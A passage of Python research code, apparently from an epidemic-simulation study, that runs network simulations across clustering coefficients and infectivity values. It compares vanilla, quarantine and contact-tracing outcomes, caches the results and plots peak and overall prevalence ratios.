I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Clustering target not reached') unsuccessful_flags_2.append(i) peak_times_2[i] = np.nan peak_heights_2[i] = np.nan peak_heights_sd_2[i] = np.nan period_prevalences_2[i] = np.nan period_prevalences_sd_2[i] = np.nan peak_times_3 = np.ndarray(res) peak_heights_3 = np.ndarray(res) peak_heights_sd_3 = np.ndarray(res) period_prevalences_3 = np.ndarray(res) period_prevalences_sd_3 = np.ndarray(res) unsuccessful_flags_3 = [] for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing', force_recompute=force_recompute, path=path, clustering=C) peak_times_3[i] = t_peak peak_heights_3[i] = mean_peak peak_heights_sd_3[i] = sd_peak period_prevalences_3[i] = mean_prevalence period_prevalences_sd_3[i] = sd_prevalence # Cs[i] = net.final_cluster_coeff # in the end I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Clustering target not reached') unsuccessful_flags_3.append(i) peak_times_3[i] = np.nan peak_heights_3[i] = np.nan peak_heights_sd_3[i] = np.nan period_prevalences_3[i] = np.nan period_prevalences_sd_3[i] = np.nan dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_clustering) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f: out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1, Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2, Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3] pickle.dump(out, f) fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes ax1.plot(Cs, peak_times_1, Cs, peak_times_2, Cs, peak_times_3) ax1.set_ylabel('Peak time') ax2.plot(Cs, peak_heights_1, Cs, peak_heights_2, Cs, peak_heights_3) ax2.set_ylabel('Peak prevalence') ax3.plot(Cs, period_prevalences_1, Cs, period_prevalences_2, Cs, period_prevalences_3) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('C(g)') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(Cs[1:-1], minor=True) ax3.set_xticks([interval[0], interval[1]]) # plt.tick_params( # axis='x', # changes apply to the x-axis # which='minor', # both major and minor ticks are affected # # bottom=False, # ticks along the bottom edge are off # # top=False, # ticks along the top edge are off # labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) plt.legend(['Vanilla', 'Quarantine', 'Tracing']) parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') return out # Cs, unsuccessful_flags, times, peaks, period_prev # OLD, now this is in vary_C_pi_comp_corrected # def vary_C_comp_corrected(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, force_recompute=False, # path=None): # # BROKEN! Since martin's commit? # # # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome # # if not interval: # # THEORY: the average clustering coeff of erdos renyi networks is p! # # so I test around that to see what changed # interval = (0.5 * p, 10 * p) # # Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) # # # the following two variables save the actual values that were achieved by the heuristic. # # In theory, these should be approximately the same in each net # achieved_clusterings = np.zeros((3, res)) # achieved_disps = np.zeros((3, res)) # # # vanilla # peak_times_1 = np.ndarray(res) # peak_heights_1 = np.ndarray(res) # peak_heights_sd_1 = np.ndarray(res) # period_prevalences_1 = np.ndarray(res) # period_prevalences_sd_1 = np.ndarray(res) # unsuccessful_flags_1 = [] # for i, C in tqdm(enumerate(Cs), total=res,desc='Vanilla'): # net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag , achieved_clustering, achieved_disp = \ # simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla', # force_recompute=force_recompute, # path=path, clustering=C) # # assert equilib_flag, 'Sim not complete?' # # peak_times_1[i] = t_peak # peak_heights_1[i] = mean_peak # peak_heights_sd_1[i] = sd_peak # period_prevalences_1[i] = mean_prevalence # period_prevalences_sd_1[i] = sd_prevalence # # achieved_clusterings[0, i] = achieved_clustering # achieved_disps[0, i] = achieved_disp # # # # exposed = counts[EXP_STATE, :] # # infected = counts[INF_STATE, :] # # ep_curve = exposed + infected # # # # exposed_sd = sd[EXP_STATE, :] # # infected_sd = sd[INF_STATE, :] # # ep_curve_sd = exposed_sd + infected_sd # # # # # these are the point prevalence +- sd # # upper_alpha = (ep_curve[t_peak] + ep_curve_sd[t_peak])/n # # lower_alpha = (ep_curve[t_peak] - ep_curve_sd[t_peak])/n # # # # recovered = counts[REC_STATE, :] # # recovered_sd = sd[REC_STATE, :] # # # # # # upper_beta = recovered[-1]-recovered_sd/n # # # # quarantine # peak_times_2 = np.ndarray(res) # peak_heights_2 = np.ndarray(res) # peak_heights_sd_2 = np.ndarray(res) # period_prevalences_2 = np.ndarray(res) # period_prevalences_sd_2 = np.ndarray(res) # unsuccessful_flags_2 = [] # for i, C in tqdm(enumerate(Cs), total=res,desc='Quarantine'): # net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag , achieved_clustering, achieved_disp = \ # simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine', # force_recompute=force_recompute, # path=path, clustering=C) # # assert equilib_flag, 'Sim not complete?' # # peak_times_2[i] = t_peak # peak_heights_2[i] = mean_peak / peak_heights_1[i] # peak_heights_sd_2[i] = sd_peak # period_prevalences_2[i] = mean_prevalence / period_prevalences_1[i] # period_prevalences_sd_2[i] = sd_prevalence # # achieved_clusterings[1, i] = achieved_clustering # achieved_disps[1, i] = achieved_disp # # # # # # tracing # peak_times_3 = np.ndarray(res) # peak_heights_3 = np.ndarray(res) # peak_heights_sd_3 = np.ndarray(res) # period_prevalences_3 = np.ndarray(res) # period_prevalences_sd_3 = np.ndarray(res) # unsuccessful_flags_3 = [] # for i, C in tqdm(enumerate(Cs), total=res,desc='Tracing'): # net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag , achieved_clustering, achieved_disp = \ # simple_experiment(n, p, p_i, 2*mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing', # force_recompute=force_recompute, # path=path, clustering=C) # # assert equilib_flag, 'Sim not complete?' # # peak_times_3[i] = t_peak # peak_heights_3[i] = mean_peak / peak_heights_1[i] # peak_heights_sd_3[i] = sd_peak # period_prevalences_3[i] = mean_prevalence / period_prevalences_1[i] # period_prevalences_3_sd_2[i] = sd_prevalencea # # achieved_clusterings[2, i] = achieved_clustering # achieved_disps[2, i] = achieved_disp # # dirname_parent = os.path.dirname(__file__) # dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') # # id_params = ( # n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, # epsilon_clustering) # # normal hashes are salted between runs -> use something that is persistent # tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) # # with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f: # out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1, # Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2, # Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3, # achieved_clusterings, achieved_disps] # # pickle.dump(out, f) # # # two modes for visualization # show_both = False # if show_both: # fig, axes = plt.subplots(2, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # # # fig.subplots_adjust(wspace = 0.5) # ax2, ax3 = axes # # # ax1.plot(Cs, peak_times_1,Cs, peak_times_2,Cs, peak_times_3) # # ax1.set_ylabel('Peak time') # # ax2.plot(Cs, peak_heights_2, 'C1') # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax3.plot(Cs, period_prevalences_2, 'C1') # ax3.plot(Cs, period_prevalences_3, 'C2') # ax3.set_ylabel('Scaled period prevalence') # ax3.set_xlabel('C(g)') # # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] # ax3.set_xticks(Cs, minor=False) # ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # # # ax3.set_xticks([interval[0], interval[1]]) # # # plt.tick_params( # # axis='x', # changes apply to the x-axis # # which='minor', # both major and minor ticks are affected # # # bottom=False, # ticks along the bottom edge are off # # # top=False, # ticks along the top edge are off # # labelbottom=False) # labels along the bottom edge are off # # ax_upper_axis = ax2.twiny() # # ax_upper_axis.set_xlim(ax3.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)]) # # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # ax_upper_axis.set_xlabel('D(g)') # # # plt.xticks([interval[0],interval[1]]) # ax3.legend(['Quarantine', 'Tracing']) # # parent = os.path.dirname(path) # fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected'.format( # n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') # else: # fig, axes = plt.subplots(2, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # # # fig.subplots_adjust(wspace = 0.5) # ax2, ax3 = axes # # # ax1.plot(Cs, peak_times_1,Cs, peak_times_2,Cs, peak_times_3) # # ax1.set_ylabel('Peak time') # # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax3.plot(Cs, period_prevalences_3, 'C2') # ax3.set_ylabel('Scaled period prevalence') # ax3.set_xlabel('C(g)') # ax3.set_xticks(Cs, minor=False) # ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # # # ax3.set_xticks(Cs[1:-1], minor=True) # # ax3.set_xticks([interval[0], interval[1]]) # # ax3.set_xticks(Cs, minor=True) # # ax_upper_axis = ax2.twiny() # # ax_upper_axis.set_xlim(ax3.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)]) # # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # ax_upper_axis.set_xlabel('D(g)') # # # plt.legend(['Quarantine', 'Tracing']) # ax3.legend(['Tracing', ]) # # parent = os.path.dirname(path) # fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected_tracing'.format( # n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') # # return out def vary_C_pi_comp_corrected(res, n, p, p_is: tuple, mc_iterations, max_t, interval=None, seed=0, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome # Several values for infectvity p_i are used Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) n_p_i = len(p_is) assert n_p_i <= 5, 'Less values for p_i should be selected for visibility' # the following two variables save the actual values that were achieved by the heuristic. # In theory, these should be approximately the same in each net achieved_clusterings = np.zeros((3 * n_p_i, res)) achieved_disps = np.zeros((3 * n_p_i, res)) # vanilla peak_times_1 = np.ndarray((res, n_p_i)) peak_heights_1 = np.ndarray((res, n_p_i)) peak_heights_sd_1 = np.ndarray((res, n_p_i)) period_prevalences_1 = np.ndarray((res, n_p_i)) period_prevalences_sd_1 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 156484 + seed + i, mode='vanilla', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_1[i, j] = t_peak peak_heights_1[i, j] = mean_peak peak_heights_sd_1[i, j] = sd_peak period_prevalences_1[i, j] = mean_prevalence period_prevalences_sd_1[i, j] = sd_prevalence achieved_clusterings[j, i] = achieved_clustering achieved_disps[j, i] = achieved_disp # quarantine peak_times_2 = np.ndarray((res, n_p_i)) peak_heights_2 = np.ndarray((res, n_p_i)) peak_heights_sd_2 = np.ndarray((res, n_p_i)) period_prevalences_2 = np.ndarray((res, n_p_i)) period_prevalences_sd_2 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 84265 + seed + i + res, mode='quarantine', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_2[i, j] = t_peak peak_heights_2[i, j] = mean_peak peak_heights_sd_2[i, j] = sd_peak period_prevalences_2[i, j] = mean_prevalence period_prevalences_sd_2[i, j] = sd_prevalence achieved_clusterings[n_p_i + j, i] = achieved_clustering achieved_disps[n_p_i + j, i] = achieved_disp # tracing peak_times_3 = np.ndarray((res, n_p_i)) peak_heights_3 = np.ndarray((res, n_p_i)) peak_heights_sd_3 = np.ndarray((res, n_p_i)) period_prevalences_3 = np.ndarray((res, n_p_i)) period_prevalences_sd_3 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 543513 + seed + i + 2 * res, mode='tracing', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_3[i, j] = t_peak peak_heights_3[i, j] = mean_peak peak_heights_sd_3[i, j] = sd_peak period_prevalences_3[i, j] = mean_prevalence period_prevalences_sd_3[i, j] = sd_prevalence achieved_clusterings[2 * n_p_i + j, i] = achieved_clustering achieved_disps[2 * n_p_i + j, i] = achieved_disp dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_is, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_clustering) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f: out = [Cs, peak_times_1, peak_heights_1, period_prevalences_1, peak_times_2, peak_heights_2, period_prevalences_2, peak_times_3, peak_heights_3, period_prevalences_3, achieved_clusterings, achieved_disps] pickle.dump(out, f) # two modes for visualization scale = 1 fig, axes = plt.subplots(4, 1, figsize=(columwidth, 2 * columwidth), dpi=1000) # fig.subplots_adjust(wspace = 0.5) # (axul, axur), (axll, axlr) = axes # upper left, upper right, lower left, lower right ax1, ax2, ax3, ax4 = axes # reordered to be 4x1. # ax1.set_ylabel('$\\alpha_q$') # ax3.set_ylabel('$\\alpha_t$') # ax2.set_ylabel('$\\beta_q$') # ax4.set_ylabel('$\\beta_t$') ax1.set_ylabel('peak ratio ($\\alpha$)') ax3.set_ylabel('peak ratio ($\\alpha$)') ax2.set_ylabel('overall ratio ($\\beta$)') ax4.set_ylabel('overall ratio ($\\beta$)') ax1.set_ylim([0, 1]) ax2.set_ylim([0, 1]) ax3.set_ylim([0, 1]) ax4.set_ylim([0, 1]) # ax1.set_ylabel('Scaled peak height') # ax3.set_ylabel('Scaled peak height') # ax2.set_ylabel('Scaled period prevalence') # ax4.set_ylabel('Scaled period prevalence') # ax1.set_ylabel('Scaled peak height') # ax3.set_ylabel('Scaled peak height') # ax2.set_ylabel('Scaled period prevalence') # ax4.set_ylabel('Scaled period prevalence') # ax2.set_xlabel('C(g)') ax4.set_xlabel('C(g)') # axll.set_xticks(Cs, minor=False) # axll.xaxis.set_major_formatter(FormatStrFormatter('%.2f')) # axlr.set_xticks(Cs, minor=False) # axlr.xaxis.set_major_formatter(FormatStrFormatter('%.2f')) # ax1.set_title('Quarantine') # ax3.set_title('Tracing') # ax1.set_prop_cycle(color=['orange','orange','orange',],linestyle=['-','--',':']) # ax2.set_prop_cycle(color=['orange','orange','orange',],linestyle=['-','--',':']) # ax3.set_prop_cycle(color=['green','green','green',],linestyle=['-','--',':']) # ax4.set_prop_cycle(color=['green','green','green',],linestyle=['-','--',':']) oranges = plt.get_cmap('Blues') greens = plt.get_cmap('Greens') n_colors = n_p_i col_vals = np.linspace(0.7, 1, n_colors) colors = [oranges(col_vals[0]), oranges(col_vals[1]), oranges(col_vals[2]), oranges(col_vals[3]), oranges(col_vals[4]), greens(col_vals[0]), greens(col_vals[1]), greens(col_vals[2]), greens(col_vals[3]), greens(col_vals[4]), ] linestyles = ['-', '--', ':', '-.', (0, (5, 10))] line_artists = [None, ] * 2 * n_p_i for i in range(n_p_i): linestyle = linestyles[i] l1 = ax1.plot(Cs, peak_heights_2[:, i] / peak_heights_1[:, i], color=colors[i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax1, Cs, peak_heights_2[:, i], peak_heights_sd_2[:, i], peak_heights_1[:, i], peak_heights_sd_1[:, i], color=colors[i], mccount=mc_iterations, p=95) l3 = ax3.plot(Cs, peak_heights_3[:, i] / peak_heights_1[:, i], color=colors[n_p_i + i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax3, Cs, peak_heights_3[:, i], peak_heights_sd_3[:, i], peak_heights_1[:, i], peak_heights_sd_1[:, i], color=colors[n_p_i + i], mccount=mc_iterations, p=95) l2 = ax2.plot(Cs, period_prevalences_2[:, i] / period_prevalences_1[:, i], color=colors[i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax2, Cs, period_prevalences_2[:, i], period_prevalences_sd_2[:, i], period_prevalences_1[:, i], period_prevalences_sd_1[:, i], color=colors[i], mccount=mc_iterations, p=95) l4 = ax4.plot(Cs, period_prevalences_3[:, i] / period_prevalences_1[:, i], color=colors[n_p_i + i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax4, Cs, period_prevalences_3[:, i], period_prevalences_sd_3[:, i], period_prevalences_1[:, i], period_prevalences_sd_1[:, i], color=colors[n_p_i + i], mccount=mc_iterations, p=95) line_artists[i] = l1[0] line_artists[n_p_i + i] = l3[0] labels1 = list(['quar.: $p_i$=' + str(val) for val in p_is]) labels2 = list(['trac.: $p_i$=' + str(val) for val in p_is]) # line_labels = [None,]*2*n_p_i # line_labels[::2] = labels1 # line_labels[1::2] = labels2 line_labels = labels1 + labels2 fig.legend(handles=line_artists, # The line objects labels=line_labels, # The labels for each line loc="center", # Position of legend bbox_to_anchor=(0.5, -0.1), borderaxespad=0.1, # Small spacing around legend box ncol=2 ) plt.subplots_adjust(bottom=0.01) # ax1.legend(['$p_i$=' + str(val) for val in p_is],loc='upper center', bbox_to_anchor=(0.5, -0.25), ncol=3) # looks bad # ax2.legend(['$p_i$=' + str(val) for val in p_is],bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left',ncol=3, mode="expand") # looks worse # ax3.legend(['$p_i$=' + str(val) for val in p_is], loc='upper center', bbox_to_anchor=(0.5, -0.25),fancybox=True, shadow=True, ncol=3) # # left upper axis for dispersion values # ax_upper_axis = axul.twiny() # ax_upper_axis.set_xlim(axul.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)]) # ax_upper_axis.set_xlabel('D(g)') # # # right upper axis for dispersion values # ax_upper_axis = axur.twiny() # ax_upper_axis.set_xlim(axul.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)]) # ax_upper_axis.set_xlabel('D(g)') # ax2.plot(Cs, peak_heights_2, 'C1') # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax2.plot(Cs, peak_heights_2, 'C1') # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax3.plot(Cs, period_prevalences_2, 'C1') # ax3.plot(Cs, period_prevalences_3, 'C2') # ax3.set_ylabel('Scaled period prevalence') # ax3.set_xlabel('C(g)') # # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] # ax3.set_xticks(Cs, minor=False) # ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # # # ax_upper_axis = ax2.twiny() # # ax_upper_axis.set_xlim(ax3.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)]) # # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # ax_upper_axis.set_xlabel('D(g)') # # # plt.xticks([interval[0],interval[1]]) # ax3.legend(['Quarantine', 'Tracing']) plt.tight_layout() parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight', pad_inches=0) return out def vary_C_pi_comp_corrected_flipped(res, n, p, p_is: tuple, mc_iterations, max_t, interval=None, seed=0, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome # Several values for infectvity p_i are used Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) n_p_i = len(p_is) # assert n_p_i <= 5, 'Less values for p_i should be selected for visibility' # the following two variables save the actual values that were achieved by the heuristic. # In theory, these should be approximately the same in each net achieved_clusterings = np.zeros((3 * n_p_i, res)) achieved_disps = np.zeros((3 * n_p_i, res)) # vanilla peak_times_1 = np.ndarray((res, n_p_i)) peak_heights_1 = np.ndarray((res, n_p_i)) peak_heights_sd_1 = np.ndarray((res, n_p_i)) period_prevalences_1 = np.ndarray((res, n_p_i)) period_prevalences_sd_1 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 156484 + seed + i, mode='vanilla', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_1[i, j] = t_peak peak_heights_1[i, j] = mean_peak peak_heights_sd_1[i, j] = sd_peak period_prevalences_1[i, j] = mean_prevalence period_prevalences_sd_1[i, j] = sd_prevalence achieved_clusterings[j, i] = achieved_clustering achieved_disps[j, i] = achieved_disp # quarantine peak_times_2 = np.ndarray((res, n_p_i)) peak_heights_2 = np.ndarray((res, n_p_i)) peak_heights_sd_2 = np.ndarray((res, n_p_i)) period_prevalences_2 = np.ndarray((res, n_p_i)) period_prevalences_sd_2 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 84265 + seed + i + res, mode='quarantine', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_2[i, j] = t_peak peak_heights_2[i, j] = mean_peak peak_heights_sd_2[i, j] = sd_peak period_prevalences_2[i, j] = mean_prevalence period_prevalences_sd_2[i, j] = sd_prevalence achieved_clusterings[n_p_i + j, i] = achieved_clustering achieved_disps[n_p_i + j, i] = achieved_disp # tracing peak_times_3 = np.ndarray((res, n_p_i)) peak_heights_3 = np.ndarray((res, n_p_i)) peak_heights_sd_3 = np.ndarray((res, n_p_i)) period_prevalences_3 = np.ndarray((res, n_p_i)) period_prevalences_sd_3 = np.ndarray((res, n_p_i)) for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'): for j, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 543513 + seed + i + 2 * res, mode='tracing', force_recompute=force_recompute, path=path, clustering=C) assert equilib_flag, 'Sim not complete?' peak_times_3[i, j] = t_peak peak_heights_3[i, j] = mean_peak peak_heights_sd_3[i, j] = sd_peak period_prevalences_3[i, j] = mean_prevalence period_prevalences_sd_3[i, j] = sd_prevalence achieved_clusterings[2 * n_p_i + j, i] = achieved_clustering achieved_disps[2 * n_p_i + j, i] = achieved_disp dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_is, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_clustering) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f: out = [Cs, peak_times_1, peak_heights_1, period_prevalences_1, peak_times_2, peak_heights_2, period_prevalences_2, peak_times_3, peak_heights_3, period_prevalences_3, achieved_clusterings, achieved_disps] pickle.dump(out, f) # two modes for visualization scale = 1 fig, axes = plt.subplots(4, 1, figsize=(columwidth, 2 * columwidth), dpi=1000) # fig.subplots_adjust(wspace = 0.5) # (axul, axur), (axll, axlr) = axes # upper left, upper right, lower left, lower right ax1, ax2, ax3, ax4 = axes # reordered to be 4x1. # ax1.set_ylabel('$\\alpha_q$') # ax3.set_ylabel('$\\alpha_t$') # ax2.set_ylabel('$\\beta_q$') # ax4.set_ylabel('$\\beta_t$') ax1.set_ylabel('peak ratio ($\\alpha$)') ax3.set_ylabel('peak ratio ($\\alpha$)') ax2.set_ylabel('overall ratio ($\\beta$)') ax4.set_ylabel('overall ratio ($\\beta$)') ax1.set_ylim([0, 1]) ax2.set_ylim([0, 1]) ax3.set_ylim([0, 1]) ax4.set_ylim([0, 1]) # ax1.set_ylabel('Scaled peak height') # ax3.set_ylabel('Scaled peak height') # ax2.set_ylabel('Scaled period prevalence') # ax4.set_ylabel('Scaled period prevalence') # ax1.set_ylabel('Scaled peak height') # ax3.set_ylabel('Scaled peak height') # ax2.set_ylabel('Scaled period prevalence') # ax4.set_ylabel('Scaled period prevalence') # ax2.set_xlabel('C(g)') # ax1.set_ylabel('$p_i$') # ax2.set_ylabel('$p_i$') # ax3.set_ylabel('$p_i$') ax4.set_xlabel('$p_i$') # axll.set_xticks(Cs, minor=False) # axll.xaxis.set_major_formatter(FormatStrFormatter('%.2f')) # axlr.set_xticks(Cs, minor=False) # axlr.xaxis.set_major_formatter(FormatStrFormatter('%.2f')) # ax1.set_title('Quarantine') # ax3.set_title('Tracing') # ax1.set_prop_cycle(color=['orange','orange','orange',],linestyle=['-','--',':']) # ax2.set_prop_cycle(color=['orange','orange','orange',],linestyle=['-','--',':']) # ax3.set_prop_cycle(color=['green','green','green',],linestyle=['-','--',':']) # ax4.set_prop_cycle(color=['green','green','green',],linestyle=['-','--',':']) step = 6 # quick and dirty, only get values for a number of Cs Cs = Cs[0::step] peak_heights_1 = peak_heights_1[0::step,:] peak_heights_2 = peak_heights_2[0::step,:] peak_heights_3 = peak_heights_3[0::step,:] peak_heights_sd_1 = peak_heights_sd_1[0::step,:] peak_heights_sd_2 = peak_heights_sd_2[0::step,:] peak_heights_sd_3 = peak_heights_sd_3[0::step,:] period_prevalences_1 = period_prevalences_1[0::step,:] period_prevalences_2 = period_prevalences_2[0::step,:] period_prevalences_3 = period_prevalences_3[0::step,:] period_prevalences_sd_1 = period_prevalences_sd_1[0::step,:] period_prevalences_sd_2 = period_prevalences_sd_2[0::step,:] period_prevalences_sd_3 = period_prevalences_sd_3[0::step,:] n_Cs = len(Cs) oranges = plt.get_cmap('Blues') greens = plt.get_cmap('Greens') n_colors = n_p_i col_vals = np.linspace(0.7, 1, n_Cs) colors = list([oranges(col_val) for col_val in col_vals]) + list([greens(col_val) for col_val in col_vals]) # colors = [oranges(col_vals[0]), oranges(col_vals[1]), oranges(col_vals[2]), # greens(col_vals[0]), greens(col_vals[1]), greens(col_vals[2]) ] linestyles = ['-', '--', ':', '-.', (0, (5, 10))] line_artists = [None, ] * 2 * n_Cs for i in range(n_Cs): linestyle = linestyles[i] l1 = ax1.plot(p_is, peak_heights_2[i,:] / peak_heights_1[i,:], color=colors[i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax1, p_is, peak_heights_2[i,:], peak_heights_sd_2[i,:], peak_heights_1[i,:], peak_heights_sd_1[i,:], color=colors[i], mccount=mc_iterations, p=95) l3 = ax3.plot(p_is, peak_heights_3[i,:] / peak_heights_1[i,:], color=colors[n_Cs + i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax3, p_is, 